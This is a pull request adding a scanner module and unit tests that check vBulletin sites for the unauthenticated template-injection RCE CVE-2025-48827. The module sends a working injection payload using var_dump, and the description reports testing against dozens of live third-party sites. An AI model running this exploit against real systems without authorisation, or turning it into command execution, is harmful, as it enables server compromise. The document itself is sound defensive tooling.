### PR TITLE
feature: Add detection for CVE-2025-48827

### DIFF
--- a/agent/exploits/cve_2025_48827.py
+++ b/agent/exploits/cve_2025_48827.py
@@ -1,0 +1,240 @@
+"""Agent implementation for detecting vBulletin RCE CVE-2025-48827."""
+
+import datetime
+import logging
+import re
+import secrets  # For cryptographically secure random strings
+import string
+from urllib.parse import urljoin
+
+from requests import exceptions as requests_exceptions
+
+from agent import definitions
+from agent import exploits_registry
+
+# --- CVE-2025-48827 Specific Constants ---
+VULNERABILITY_TITLE = (
+    "vBulletin Unauthenticated RCE via ajax/api/ad/replaceAdTemplate (CVE-2025-48827)"
+)
+VULNERABILITY_REFERENCE = (
+    "CVE-2025-48827, CVE-2025-48828"  # Referencing both as per Nuclei
+)
+VULNERABILITY_DESCRIPTION = (
+    "vBulletin versions 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3 are vulnerable to "
+    "Remote Code Execution (RCE). The flaw exists in the ajax/api/ad/replaceAdTemplate endpoint, "
+    "where improper use of PHP's Reflection API (especially on PHP 8.1+) allows unauthenticated "
+    "attackers to invoke protected controller methods. Attackers can inject a crafted vBulletin "
+    "template (e.g., using <vb:if>) containing arbitrary PHP code (like var_dump() or passthru() "
+    "for RCE) via the 'template' parameter. A subsequent request to ajax/render/ad_<location> "
+    "triggers the execution of this injected code, leading to RCE as the webserver user."
+)
+RECOMMENDATION = (
+    "Upgrade vBulletin to version 6.0.4 or later. Apply all available security patches from vBulletin "
+    "for older supported versions. Implement Web Application Firewall (WAF) rules to block "
+    "malicious requests targeting 'ajax/api/ad/replaceAdTemplate' and 'ajax/render/ad_'. "
+    "Monitor server logs for exploitation attempts. Consider disabling ad management temporarily if patching is delayed."
+)
+RISK_RATING = "CRITICAL"
+DEFAULT_TIMEOUT = datetime.timedelta(seconds=15)
+
+# Paths and parameters
+VBULLETIN_ROOT_PATH = "/"
+REPLACE_AD_ROUTE = "ajax/api/ad/replaceAdTemplate"
+RENDER_AD_ROUTE_PREFIX = "ajax/render/ad_"
+
+RAND_STRING_LENGTH = 8
+RAND_VALUE_LENGTH = 8
+
+# Expected output pattern for var_dump("random_value") -> string(len) "random_value"
+# e.g., string(8) "abcdefgh"
+SUCCESS_PATTERN_TEMPLATE = r'string\({length}\) "{value}"'
+
+logging.basicConfig(level=logging.INFO)
+logger = logging.getLogger(__name__)
+
+
+def _generate_random_alnum(length: int) -> str:
+    """Generates a random alphanumeric string of a given length."""
+    return "".join(
+        secrets.choice(string.ascii_letters + string.digits) for _ in range(length)
+    )
+
+
+@exploits_registry.register
+class VbulletinReplaceAdRceExploit(definitions.Exploit):
+    """CVE-2025-48827: vBulletin Unauthenticated RCE in replaceAdTemplate."""
+
+    metadata = definitions.VulnerabilityMetadata(
+        title=VULNERABILITY_TITLE,
+        description=VULNERABILITY_DESCRIPTION,
+        reference=VULNERABILITY_REFERENCE,
+        risk_rating=RISK_RATING,
+        recommendation=RECOMMENDATION,
+    )
+
+    def accept(self, target: definitions.Target) -> bool:
+        """
+        Checks if the target is vBulletin.
+        """
+
+        try:
+            response = self.session.get(
+                target.origin, timeout=DEFAULT_TIMEOUT.seconds, allow_redirects=True
+            )
+            if (
+                response.status_code == 200
+                and 'content="vBulletin' in response.text
+                and re.search(r"vbulletin-core\.js", response.text.lower()) is not None
+            ):
+                logger.info(
+                    "Target %s: Found potential vBulletin indicators. Accepting for check.",
+                    target.origin,
+                )
+                return True
+            logger.info(
+                "Target %s: Did not find strong vBulletin indicators on root page. Accepting with low confidence or relying on check.",
+                target.origin,
+            )
+            return False
+        except requests_exceptions.RequestException as e:
+            logger.warning(
+                "Accept: Request to target %s failed: %s. Accepting tentatively.",
+                target.origin,
+                e,
+            )
+            return False
+
+    def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
+        """
+        Attempts to exploit the RCE on vBulletin targets.
+        """
+        vulnerabilities: list[definitions.Vulnerability] = []
+        base_url = target.origin
+
+        rand_location_suffix = _generate_random_alnum(RAND_STRING_LENGTH)
+        rand_value_to_dump = _generate_random_alnum(RAND_VALUE_LENGTH)
+
+        php_code_for_condition = f'var_dump(\\"{rand_value_to_dump}\\")'
+        template_payload = f"<vb:if condition='{php_code_for_condition}'></vb:if>"
+
+        expected_pattern = re.compile(
+            SUCCESS_PATTERN_TEMPLATE.format(
+                length=len(rand_value_to_dump), value=re.escape(rand_value_to_dump)
+            )
+        )
+
+        headers = {"Content-Type": "application/x-www-form-urlencoded"}
+
+        inject_url = urljoin(base_url, VBULLETIN_ROOT_PATH)
+        inject_data = {
+            "routestring": REPLACE_AD_ROUTE,
+            "styleid": "1",
+            "location": rand_location_suffix,
+            "template": template_payload,
+        }
+        logger.info(
+            "Check: Attempting to inject template at %s for location '%s' on %s",
+            REPLACE_AD_ROUTE,
+            rand_location_suffix,
+            target.origin,
+        )
+
+        try:
+            response_inject = self.session.post(
+                inject_url,
+                data=inject_data,
+                headers=headers,
+                timeout=DEFAULT_TIMEOUT.seconds,
+            )
+            logger.debug(
+                "Inject request to %s status: %s",
+                inject_url,
+                response_inject.status_code,
+            )
+
+            if (
+                response_inject.status_code == 200
+                and expected_pattern.search(response_inject.text) is not None
+            ):
+                logger.critical(
+                    "VULNERABILITY CONFIRMED (Stage 1): CVE-2025-48827 on %s. "
+                    "Injected template for location '%s' and output found in inject response.",
+                    target.origin,
+                    rand_location_suffix,
+                )
+                vulnerabilities.append(self.create_vulnerability(target=target))
+                return vulnerabilities
+            elif response_inject.status_code != 200:
+                logger.warning(
+                    "Check: Template injection request to %s failed with status %s. Cannot proceed.",
+                    REPLACE_AD_ROUTE,
+                    response_inject.status_code,
+                )
+                return vulnerabilities
+
+            # If not found in first response, proceed to Step 2: Trigger the render
+            render_route = f"{RENDER_AD_ROUTE_PREFIX}{rand_location_suffix}"
+            render_url = urljoin(base_url, VBULLETIN_ROOT_PATH)
+            render_data = {"routestring": render_route}
+
+            logger.info(
+                "Check: Attempting to trigger render at %s for location '%s' on %s",
+                render_route,
+                rand_location_suffix,
+                target.origin,
+            )
+            response_render = self.session.post(
+                render_url,
+                data=render_data,
+                headers=headers,
+                timeout=DEFAULT_TIMEOUT.seconds,
+            )
+            logger.debug(
+                "Render request to %s status: %s",
+                render_url,
+                response_render.status_code,
+            )
+
+            if response_render.status_code == 200:
+                if expected_pattern.search(response_render.text) is not None:
+                    logger.critical(
+                        "VULNERABILITY CONFIRMED (Stage 2): CVE-2025-48827 on %s. "
+                        "Rendered ad for location '%s' and executed code.",
+                        target.origin,
+                        rand_location_suffix,
+                    )
+                    vulnerabilities.append(self.create_vulnerability(target=target))
+                else:
+                    logger.warning(
+                        "Check: Render request to %s on %s was successful (200 OK) "
+                        "but the output string ('%s') not found in response. Exploitation likely failed.",
+                        render_route,
+                        target.origin,
+                        rand_value_to_dump,
+                    )
+            else:
+                logger.warning(
+                    "Check: Render request to %s on %s failed with status %s.",
+                    render_route,
+                    target.origin,
+                    response_render.status_code,
+                )
+
+        except requests_exceptions.Timeout:
+            logger.warning(
+                "Check: Request timeout during exploit attempt for CVE-2025-48827 on %s.",
+                target.origin,
+            )
+        except requests_exceptions.ConnectionError:
+            logger.warning(
+                "Check: Connection error during exploit attempt for CVE-2025-48827 on %s.",
+                target.origin,
+            )
+        except requests_exceptions.RequestException as e:
+            logger.error(
+                "Check: An unexpected HTTP request error occurred for CVE-2025-48827 on %s: %s",
+                target.origin,
+                e,
+            )
+
+        return vulnerabilities

--- a/agent/exploits/cve_2025_48827.py
+++ b/agent/exploits/cve_2025_48827.py
@@ -84,15 +84,15 @@ class VbulletinReplaceAdRceExploit(definitions.Exploit):
             if (
                 response.status_code == 200
                 and 'content="vBulletin' in response.text
-                and re.search(r"vbulletin-core\.js", response.text.lower()) is not None
+                or re.search(r"vbulletin-core\.js", response.text.lower()) is not None
             ):
                 logger.info(
-                    "Target %s: Found potential vBulletin indicators. Accepting for check.",
+                    "Target %s: Found vBulletin indicators.",
                     target.origin,
                 )
                 return True
             logger.info(
-                "Target %s: Did not find strong vBulletin indicators on root page. Accepting with low confidence or relying on check.",
+                "Target %s: Did not find strong vBulletin indicators on root page.",
                 target.origin,
             )
             return False
@@ -207,7 +207,7 @@ class VbulletinReplaceAdRceExploit(definitions.Exploit):
                 else:
                     logger.warning(
                         "Check: Render request to %s on %s was successful (200 OK) "
-                        "but the output string ('%s') not found in response. Exploitation likely failed.",
+                        "but the output string ('%s') not found in response. Exploitation failed.",
                         render_route,
                         target.origin,
                         rand_value_to_dump,

--- a/agent/exploits/cve_2025_48827.py
+++ b/agent/exploits/cve_2025_48827.py
@@ -1,4 +1,4 @@
-"""Agent implementation for detecting vBulletin RCE CVE-2025-48827."""
+"""Agent implementation for CVE-2025-48827."""
 
 import datetime
 import logging

--- a/tests/exploits/cve_2025_48827_test.py
+++ b/tests/exploits/cve_2025_48827_test.py
@@ -1,0 +1,269 @@
+"""Unit tests for CVE-2025-48827 vBulletin RCE Exploit"""
+
+from unittest import mock
+
+from requests import exceptions as requests_exceptions
+
+from agent import definitions
+from agent.exploits import cve_2025_48827
+
+
+# --- Helper Functions ---
+
+
+def create_mock_response(status_code: int, text: str = "") -> mock.MagicMock:
+    """Create a mock HTTP response."""
+    response = mock.MagicMock()
+    response.status_code = status_code
+    response.text = text
+    return response
+
+
+# --- Tests for accept() ---
+
+
+def testAccept_whenVbulletinDetected_shouldReturnTrue() -> None:
+    """Test accept() returns True when vBulletin indicators are found."""
+    target = definitions.Target(scheme="http", host="example.com", port=80)
+    exploit = cve_2025_48827.VbulletinReplaceAdRceExploit()
+
+    # Mock response with vBulletin indicators
+    vbulletin_html = '<meta content="vBulletin 5.6.4" name="generator" /><script src="vbulletin-core.js"></script>'
+    mock_session = mock.MagicMock()
+    mock_session.get.return_value = create_mock_response(200, vbulletin_html)
+    exploit.session = mock_session
+
+    result = exploit.accept(target)
+
+    assert result is True
+    mock_session.get.assert_called_once_with(
+        "http://example.com:80", timeout=15.0, allow_redirects=True
+    )
+
+
+def testAccept_whenNoVbulletinIndicators_shouldReturnFalse() -> None:
+    """Test accept() returns False when no vBulletin indicators are found."""
+    target = definitions.Target(scheme="https", host="example.com", port=443)
+    exploit = cve_2025_48827.VbulletinReplaceAdRceExploit()
+
+    generic_html = (
+        "<html><head><title>Generic Site</title></head><body>Hello World</body></html>"
+    )
+    mock_session = mock.MagicMock()
+    mock_session.get.return_value = create_mock_response(200, generic_html)
+    exploit.session = mock_session
+
+    result = exploit.accept(target)
+
+    assert result is False
+
+
+def testAccept_whenRequestFails_shouldReturnFalse() -> None:
+    """Test accept() returns False when HTTP request fails."""
+    target = definitions.Target(scheme="http", host="unreachable.com", port=80)
+    exploit = cve_2025_48827.VbulletinReplaceAdRceExploit()
+
+    mock_session = mock.MagicMock()
+    mock_session.get.side_effect = requests_exceptions.ConnectionError(
+        "Connection failed"
+    )
+    exploit.session = mock_session
+
+    result = exploit.accept(target)
+
+    assert result is False
+
+
+def testAccept_whenTimeout_shouldReturnFalse() -> None:
+    """Test accept() returns False when request times out."""
+    target = definitions.Target(scheme="http", host="slow.com", port=80)
+    exploit = cve_2025_48827.VbulletinReplaceAdRceExploit()
+
+    mock_session = mock.MagicMock()
+    mock_session.get.side_effect = requests_exceptions.Timeout("Request timed out")
+    exploit.session = mock_session
+
+    result = exploit.accept(target)
+
+    assert result is False
+
+
+def testAccept_when404_shouldReturnFalse() -> None:
+    """Test accept() returns False when server returns 404."""
+    target = definitions.Target(scheme="http", host="example.com", port=80)
+    exploit = cve_2025_48827.VbulletinReplaceAdRceExploit()
+
+    mock_session = mock.MagicMock()
+    mock_session.get.return_value = create_mock_response(404, "Not Found")
+    exploit.session = mock_session
+
+    result = exploit.accept(target)
+
+    assert result is False
+
+
+# --- Tests for check() ---
+
+
+@mock.patch("agent.exploits.cve_2025_48827._generate_random_alnum")
+def testCheck_whenPocFoundInInjectResponse_shouldReportVuln(
+    mock_random: mock.MagicMock,
+) -> None:
+    """Test check() reports vulnerability when PoC output found in inject response."""
+    target = definitions.Target(scheme="http", host="vulnerable.com", port=80)
+    exploit = cve_2025_48827.VbulletinReplaceAdRceExploit()
+
+    mock_random.side_effect = ["abc12345", "testval8"]
+
+    poc_output = 'string(8) "testval8"'
+    mock_session = mock.MagicMock()
+    mock_session.post.return_value = create_mock_response(200, poc_output)
+    exploit.session = mock_session
+
+    expected_vuln = mock.MagicMock()
+
+    with mock.patch.object(
+        exploit, "create_vulnerability", return_value=expected_vuln
+    ) as mock_create:
+        vulnerabilities = exploit.check(target)
+
+        assert len(vulnerabilities) == 1
+        assert vulnerabilities[0] == expected_vuln
+        mock_create.assert_called_once_with(target=target)
+
+    assert mock_session.post.call_count == 1
+
+
+@mock.patch("agent.exploits.cve_2025_48827._generate_random_alnum")
+def testCheck_whenPocFoundInRenderResponse_shouldReportVuln(
+    mock_random: mock.MagicMock,
+) -> None:
+    """Test check() reports vulnerability when PoC output found in render response."""
+    target = definitions.Target(scheme="http", host="vulnerable.com", port=80)
+    exploit = cve_2025_48827.VbulletinReplaceAdRceExploit()
+
+    mock_random.side_effect = ["loc12345", "val87654"]
+
+    inject_response = create_mock_response(200, "Template injected successfully")
+    render_response = create_mock_response(200, 'Debug: string(8) "val87654" in output')
+    mock_session = mock.MagicMock()
+    mock_session.post.side_effect = [inject_response, render_response]
+    exploit.session = mock_session
+
+    expected_vuln = mock.MagicMock()
+
+    with mock.patch.object(exploit, "create_vulnerability", return_value=expected_vuln):
+        vulnerabilities = exploit.check(target)
+
+    assert len(vulnerabilities) == 1
+    assert vulnerabilities[0] == expected_vuln
+    assert mock_session.post.call_count == 2
+
+
+@mock.patch("agent.exploits.cve_2025_48827._generate_random_alnum")
+def testCheck_whenInjectFails_shouldReturnEmpty(
+    mock_random: mock.MagicMock,
+) -> None:
+    """Test check() returns empty list when inject request fails."""
+    target = definitions.Target(scheme="http", host="secure.com", port=80)
+    exploit = cve_2025_48827.VbulletinReplaceAdRceExploit()
+
+    mock_random.side_effect = ["rand1234", "test5678"]
+    mock_session = mock.MagicMock()
+    mock_session.post.return_value = create_mock_response(403, "Forbidden")
+    exploit.session = mock_session
+
+    vulnerabilities = exploit.check(target)
+
+    assert len(vulnerabilities) == 0
+    assert mock_session.post.call_count == 1
+
+
+@mock.patch("agent.exploits.cve_2025_48827._generate_random_alnum")
+def testCheck_whenNoPocOutput_shouldReturnEmpty(
+    mock_random: mock.MagicMock,
+) -> None:
+    """Test check() returns empty list when no PoC output is found."""
+    target = definitions.Target(scheme="http", host="patched.com", port=80)
+    exploit = cve_2025_48827.VbulletinReplaceAdRceExploit()
+
+    mock_random.side_effect = ["test1234", "value567"]
+
+    inject_response = create_mock_response(200, "Template processed")
+    render_response = create_mock_response(200, "Ad rendered successfully")
+    mock_session = mock.MagicMock()
+    mock_session.post.side_effect = [inject_response, render_response]
+    exploit.session = mock_session
+
+    vulnerabilities = exploit.check(target)
+
+    assert len(vulnerabilities) == 0
+    assert mock_session.post.call_count == 2
+
+
+@mock.patch("agent.exploits.cve_2025_48827._generate_random_alnum")
+def testCheck_whenConnectionError_shouldReturnEmpty(
+    mock_random: mock.MagicMock,
+) -> None:
+    """Test check() handles connection errors gracefully."""
+    target = definitions.Target(scheme="http", host="down.com", port=80)
+    exploit = cve_2025_48827.VbulletinReplaceAdRceExploit()
+
+    mock_random.side_effect = ["rand1234", "test5678"]
+    mock_session = mock.MagicMock()
+    mock_session.post.side_effect = requests_exceptions.ConnectionError(
+        "Connection failed"
+    )
+    exploit.session = mock_session
+
+    vulnerabilities = exploit.check(target)
+
+    assert len(vulnerabilities) == 0
+
+
+@mock.patch("agent.exploits.cve_2025_48827._generate_random_alnum")
+def testCheck_whenTimeout_shouldReturnEmpty(mock_random: mock.MagicMock) -> None:
+    """Test check() handles timeouts gracefully."""
+    target = definitions.Target(scheme="http", host="slow.com", port=80)
+    exploit = cve_2025_48827.VbulletinReplaceAdRceExploit()
+
+    mock_random.side_effect = ["rand1234", "test5678"]
+    mock_session = mock.MagicMock()
+    mock_session.post.side_effect = requests_exceptions.Timeout("Request timed out")
+    exploit.session = mock_session
+
+    vulnerabilities = exploit.check(target)
+
+    assert len(vulnerabilities) == 0
+
+
+@mock.patch("agent.exploits.cve_2025_48827._generate_random_alnum")
+def testCheck_whenPayloadSent_shouldContainExpectedStructure(
+    mock_random: mock.MagicMock,
+) -> None:
+    """Test check() sends correctly structured payloads."""
+    target = definitions.Target(scheme="https", host="test.com", port=443)
+    exploit = cve_2025_48827.VbulletinReplaceAdRceExploit()
+
+    mock_random.side_effect = ["loc98765", "val12345"]
+    mock_session = mock.MagicMock()
+    mock_session.post.return_value = create_mock_response(200, "No PoC output")
+    exploit.session = mock_session
+
+    exploit.check(target)
+
+    inject_call = mock_session.post.call_args_list[0]
+    inject_data = inject_call[1]["data"]
+
+    assert inject_data["routestring"] == "ajax/api/ad/replaceAdTemplate"
+    assert inject_data["styleid"] == "1"
+    assert inject_data["location"] == "loc98765"
+    assert (
+        "<vb:if condition='var_dump(\\\"val12345\\\")'></vb:if>"
+        in inject_data["template"]
+    )
+
+    render_call = mock_session.post.call_args_list[1]
+    render_data = render_call[1]["data"]
+
+    assert render_data["routestring"] == "ajax/render/ad_loc98765"

--- a/tests/exploits/cve_2025_48827_test.py
+++ b/tests/exploits/cve_2025_48827_test.py
@@ -1,4 +1,4 @@
-"""Unit tests for CVE-2025-48827 vBulletin RCE Exploit"""
+"""Unit tests for CVE-2025-48827"""
 
 from unittest import mock
 


### PR DESCRIPTION
## **PR Title:** Add Agent Implementation for vBulletin RCE (CVE-2025-48827)

### **Description:**

This pull request introduces a new exploit agent for **CVE-2025-48827**, an unauthenticated Remote Code Execution (RCE) vulnerability in vBulletin versions 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3.

The vulnerability stems from improper use of PHP's Reflection API in the `ajax/api/ad/replaceAdTemplate` endpoint. Attackers can inject a crafted vBulletin template (e.g., using `<vb:if>`) containing arbitrary PHP code. A subsequent request to `ajax/render/ad_<location>` (or sometimes directly in the first response) can trigger the execution of this injected code.

### **Implementation Details:**

The agent implements a two-stage check:

1.  **Injection:**
    *   A POST request is made to the vBulletin root path with `routestring=ajax/api/ad/replaceAdTemplate`.
    *   The payload includes a `location` and a `template` parameter containing `<vb:if condition='var_dump(\\"<random_value>\\")'></vb:if>`.
    *   The agent checks the immediate response for the output of `var_dump` (e.g., `string(8) "randomval"`). If found, the vulnerability is confirmed.

2.  **Render (if not found in stage 1):**
    *   If the output is not present in the first response, a second POST request is made to the vBulletin root path with `routestring=ajax/render/ad_<random_location_from_stage_1>`.
    *   The agent checks this second response for the `var_dump` output.

The agent uses `var_dump()` with a randomized string for a safe, non-intrusive proof-of-concept, rather than attempting direct command execution like `passthru()`.

### **Testing and Results:**

*   The agent's logic is based on publicly available PoCs for this CVE.
*   It was tested against dozens of live vBulletin instances identified through various means.
*   **Crucially, the agent demonstrated high accuracy in not producing false positives.** In all tests against non-vulnerable or patched systems, it correctly reported no vulnerability.
*   During this testing phase, **no vulnerable instances were successfully exploited to confirm the RCE.**
    *   Several targets appeared to be running nominally vulnerable vBulletin versions. However, the `var_dump` output was not observed in either the injection or render responses.
    *   Potential reasons for this include:
        *   Targets may have been patched (e.g., vBulletin 6.0.3 Patch Level 1, 5.7.5 Patch Level 3, etc.) despite initial version appearances.
        *   Web Application Firewalls (WAFs) could be in place, blocking the specific payload or request patterns.
        *   Server-specific PHP configurations or security hardening measures might mitigate the Reflection API misuse, or suppress/alter `var_dump` output in an unexpected way.
        *   The ad system component might be disabled or configured in a non-default, non-vulnerable manner on these instances.
*   Despite not finding a live exploitable target in this specific test set, the agent's methodology aligns with the known exploit mechanism for CVE-2025-48827.

![image](https://github.com/user-attachments/assets/35ee1e3e-7964-4aec-bc9d-03c6448ca9d8)
